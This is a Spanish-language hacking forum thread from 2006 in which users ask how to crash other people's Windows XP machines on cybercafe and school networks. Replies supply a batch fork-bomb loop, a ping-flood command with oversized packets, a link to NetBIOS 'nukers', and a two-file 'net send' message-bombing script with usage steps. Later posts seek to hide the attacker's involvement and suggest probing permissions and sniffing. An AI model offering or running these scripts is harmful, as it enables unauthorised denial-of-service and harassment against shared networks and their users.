como colgar winxp en un red local?

Started by LordDrack, July 05, 2006, 04:38:54 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

LordDrack

bueno tengo una duda, como puedo colgar una maquina con win xp en una red local?, digamos q tengo todas las ip's pero me da colera algunas maquinas por q c consumen todo el ancho de banda(algunos q me caen mal tambien) pero bueno, es una red siemple, a ver si me pueden ayudar a colgar la maquina o conseguir un programa para controlar el hancho de banda q consumen todas las maquinas. les doy algunos datos, todas las maquinas estan en modo administrador, winxp(creo q servipack2) red lan normal, tipo estrellas(un cyber cafe en otras palabras, gracias

freshjive

lee antes de postear o usa el search eso ya fue posteado

ZAMA

oye fresh_ mira este .bat (ya que estabamos hablando de eso) ;D posteado por
el_kiLLeR360 akí -->http://hackpr.net/foro/index.php/topic,3585.msg25684.html#msg25684

pones (Textual) en un archivo de texto o en un Edit (en DOS)

@echo off
:top
start
goto top

esto te tranka todo  :D

freshjive

jejeje si man estan buenos jaja me confundi pero eso me lo reservo jaja :-[

LordDrack

disculpa pero ya lo e buscado y realmente yo no quiero bloquear una ip, solo quiero colgar una maquina con xp, si en caso me dices q ya a sido posteado dime conq nombre esta, por q con los terminos de bloqueo, ip, colgado de win xp no lo e encontrado, gracias

_xXx_

la vdd yo no entiendo que es colgar win xp en una re local.. si ya ah sido posteado podrian poner el link o alguien me podria dar una pequeña definicion...
              saludos a todosby. _xXx_

freshjive

cheka ahi
Quote from: ZAMA on July 05, 2006, 06:58:18 PM
oye fresh_ mira este .bat (ya que estabamos hablando de eso) ;D posteado por
el_kiLLeR360 akí -->http://hackpr.net/foro/index.php/topic,3585.msg25684.html#msg25684

pones (Textual) en un archivo de texto o en un Edit (en DOS)

@echo off
start
goto top

esto te tranka todo  :D
http://hackpr.net/foro/index.php/topic,3627.0.html

LordDrack

tema cerrado gracias de todas formas =)

LordDrack

Sorry por revivir este tema..., busco programa o comando para colgar la maquina de win xp o server 2003 o win vista, solo colgar todo en una red local, si ya fue posteado la respues un favor si me pueden dar el link dado q yo no lo e encontrado, aparte si hay algun programa q pueda enviar mensajes a otras maquinas (de preferencia por d.o.s.) dado q me an dicho q existe pero hasta ahora no lo e visto. gracias por adelantado

Th3 Gh0st

Por que no pruebas con algo tan simple como el PING solo que le modificas el tamaño del paquete enviado...para hacerlo tienes que escribir lo siguiente el la ventana del DOS

ping -l [tamaño del paquete] [direccion IP] -t

si tienes alguna duda postea  ;)  ;)  ;)  :P

porq69

Man los mejores nuke q vienen para red local son para NetBios, aqui mismo en la pagina de Hackpr hay unos muy buenos chekeate y me dices www.hackpr.net/nukers.php

freak 

Bueno para que bombardeen las rede en los colegios o en cybers xDDD diviertansen ..
Ya saben copien y peguen esto en su notepad o bloc de notas y guardenlo como netsend.bat

@echo off
cls
:netsend
net send * Hola perdedores? jajaj..
goto netsend

Ese sera el mensaje que mandaremos lo pueden modificar a gusto jajajjaja

Bueno una vez que tengamos el  netsend.bat lo que haremos sera el bomber aqui lo mismo copien y pegen este codigo.

@echo off
cls
:start
start netsend.bat
goto start

A este lo guardan como  bomba.bat

Una ves que los tengan en la misma carpeta xDD  ...
Van a inicio ------------ ejecutar ------------- start bomba.bat y luego   netsend.bat y miren la red jajaajjajajaaj xDDDD
fuente: _ANtrAX_

ahora un code mio :D
tambien lo pueden poner como bomba.bat

start http://www.c-group.org
goto top

MuRdEr DreAms

freak 

Quote from: freak  on August 28, 2006, 09:10:00 AM

start http://www.c-group.org
goto top

a este no se les ocurra poner para bombardear la red porke se le abrira el navegador en su pc xDDD!

sorry no se en ke taba pensando  :-[ esto va en spam xD

duende8843

Oye freak, te e agregado al msn, pa ke me exes una manita en unas kuntas de cosas ke no termino de entender
Si no puedes hacerlo bueno, haz que parezca bueno

porq69

Quote from: freak  on August 31, 2006, 07:18:31 PM
a este no se les ocurra poner para bombardear la red porke se le abrira el navegador en su pc xDDD!

sorry no se en ke taba pensando  :-[ esto va en spam xD

Todos estos script nunca terminan, es decir son un bucle infinito haci q cuidado ya q se le puede corgal la PC local. Sobre ese ultimo -.- a ver q sale primero la pagina o la pantalla azul  :-\

duende8843

enotnces, esos script, no vale, yo los kiero pa utilizarlos en la red local de mi instituto. AMi me da igual lo ke pase, me da igual se a todos les sale un mensaje o se les keda pillao el pc, lo imporatte eske funcio y ke tambien kuando aga eso, tambien ocurra en mi pc, para ke nadie sospeche

porq69

Man deves de averiguar cuantos permisos tienes como usuario, como lo puedes averiguar?? trata de hacer peticiones netbios, prueba algunos comandos como el "at", verifica q tipo de router tienen y q switch utilizan (esencial para sniffear).

duende8843

Oye, tienes msn o algo, eske me gustaria ablar mejor por ahi. Mi msn es:  [email protected]
ESke tengo algunas dudas y necesito ayuda

LordDrack

hey yo tambien quiero, para red local e instituto, por los permisos es una cuenta de admisnitradorperosolo para la pc para la red creo q tambien pero tiene un servidor (el cual siempre me jode.... pero q se puede hacer)

duende8843

Quote from: porq69 on September 02, 2006, 04:06:46 PM
Man deves de averiguar cuantos permisos tienes como usuario, como lo puedes averiguar?? trata de hacer peticiones netbios, prueba algunos comandos como el "at", verifica q tipo de router tienen y q switch utilizan (esencial para sniffear).

komo ago todo eso??
Tambien sirve para win98??